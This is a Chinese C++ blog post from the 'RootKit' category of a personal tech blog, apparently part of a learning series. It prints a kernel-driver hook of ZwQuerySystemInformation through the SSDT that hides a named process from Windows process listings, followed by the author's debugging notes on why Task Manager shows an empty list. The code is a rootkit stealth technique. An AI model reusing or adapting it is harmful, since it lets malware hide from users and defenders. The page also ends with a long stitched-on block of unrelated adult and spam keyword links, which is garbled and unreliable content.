• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

            HOOK SSDT Hide Process (七)

            Posted on 2009-10-27 17:32 S.l.e!ep.¢% 閱讀(324) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

            [資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

            HOOK SSDT Hide Process (六)??

            下面這個函數(shù)有問題,運(yùn)行之后,Taskmgr.exe 里面的進(jìn)程列表估然顯示為空
            NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
            ????????????????????????????????????IN?PVOID?SystemInformation,?
            ????????????????????????????????????IN?ULONG?SystemInformationLength,?
            ????????????????????????????????????OUT?PULONG?ReturnLength)?
            // 定義自己的Hook函數(shù)
            {?
            ????
            ????NTSTATUS?rc;?
            ????UNICODE_STRING?process_name;
            ????
            ????RtlInitUnicodeString(
            & process_name,?L " taskmgr.exe " );
            ????
            ????rc?
            = ?(OldZwQuerySystemInformation)?(?
            ????????SystemInformationClass,?
            ????????SystemInformation,?
            ????????SystemInformationLength,?
            ????????ReturnLength);?
            ????
            ????
            if (NT_SUCCESS(rc))?
            ????{
            ????????
            ????????
            if ( 5 ? == ?SystemInformationClass)
            ????????{?
            ????????????
            ????????????
            struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
            ????????????
            struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
            ????????????
            ????????????
            if (curr -> NextEntryDelta)
            ????????????????curr?
            = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
            ????????????
            ????????????
            while (curr)
            ????????????{
            ????????????????
            if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
            ????????????????{
            ????????????????????KdPrint((
            " hide?process'name?taskmgr.exe " ));
            ????????????????????
            ????????????????????
            if (prev)?
            ????????????????????{?
            ????????????????????????
            if (curr -> NextEntryDelta)
            ????????????????????????{
            ????????????????????????????prev
            -> NextEntryDelta? += ?curr -> NextEntryDelta;
            ????????????????????????}?
            ????????????????????????
            else
            ????????????????????????{
            ????????????????????????????prev
            -> NextEntryDelta? = ? 0 ;
            ????????????????????????}
            ????????????????????}
            ????????????????????
            else
            ????????????????????{
            ????????????????????????
            if (curr -> NextEntryDelta)
            ????????????????????????{
            ????????????????????????????SystemInformation?
            = (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
            ????????????????????????}
            ????????????????????????
            else
            ????????????????????????{
            ????????????????????????????SystemInformation?
            = ?NULL;
            ????????????????????????}
            ????????????????????}
            ????????????????????
            ????????????????????
            if (curr -> NextEntryDelta)
            ????????????????????????curr?
            = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
            ????????????????????
            else
            ????????????????????{
            ????????????????????????curr?
            = ?NULL;
            ????????????????????????
            break ;
            ????????????????????}
            ????????????????????
            ????????????????}?
            // ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
            ????????????????
            ????????????????
            if (curr? != ?NULL)
            ????????????????{
            ????????????????????prev?
            = ?curr;
            ????????????????????
            ????????????????????
            if (curr -> NextEntryDelta)
            ????????????????????????curr?
            = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
            ????????????????????
            else
            ????????????????????????curr?
            = ?NULL;
            ????????????????????
            ????????????????}
            // ?if(curr?!=?NULL)
            ????????????????
            ????????????}
            // ?while(curr)?
            ????????????
            ????????}
            // ?if(5?==?SystemInformationClass)
            ????????
            ????}
            // ?if(NT_SUCCESS(rc))
            ????
            ????
            // ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
            ???? return ?rc;
            }

            使用自己的查詢進(jìn)程EXE(HOOK SSDT Hide Process (五) ),顯示結(jié)果是正常的

            驅(qū)動中判斷的是 taskmgr.exe?,在遍歷時,taskmgr.exe 剛好在最好一個,把 NextEntryDelta 設(shè)置為 0 了
            如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的

            看來,HOOK SSDT Hide Process (五) 遍歷進(jìn)程的實現(xiàn) 跟 Taskmgr.exe 的實現(xiàn)有差異, 需要再找時間看下原因

            MyZwQuerySystemInformation() 的實現(xiàn)來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
            還是會把數(shù)據(jù)傳給用戶態(tài)。
            亚洲午夜无码久久久久| 999久久久免费国产精品播放| 99久久夜色精品国产网站| 97久久精品人人澡人人爽| 欧美与黑人午夜性猛交久久久 | 久久亚洲精品无码观看不卡| 人妻无码αv中文字幕久久琪琪布| 亚洲午夜久久久久久噜噜噜| 久久国产一区二区| 久久天天躁夜夜躁狠狠躁2022 | 久久久久久午夜成人影院| 久久综合狠狠色综合伊人| 久久久久人妻一区二区三区| 久久成人精品视频| 国产69精品久久久久9999APGF | 久久ZYZ资源站无码中文动漫| 精品欧美一区二区三区久久久 | 婷婷综合久久中文字幕蜜桃三电影| 精品久久无码中文字幕| 亚洲国产精品久久| 人妻无码αv中文字幕久久琪琪布| 精品人妻伦九区久久AAA片69 | 久久婷婷国产剧情内射白浆| 成人精品一区二区久久久| 天堂久久天堂AV色综合 | 亚洲伊人久久精品影院| 久久久久久久国产免费看| 国产精品久久久久天天影视| 少妇久久久久久久久久| 久久只有这里有精品4| 久久免费香蕉视频| 久久精品免费大片国产大片| 中文精品久久久久国产网址| 久久九九精品99国产精品| 久久天堂AV综合合色蜜桃网| 人妻无码αv中文字幕久久| 欧美亚洲色综久久精品国产| 久久久无码人妻精品无码| 久久精品中文字幕无码绿巨人 | 久久成人18免费网站| 国产精品美女久久久网AV|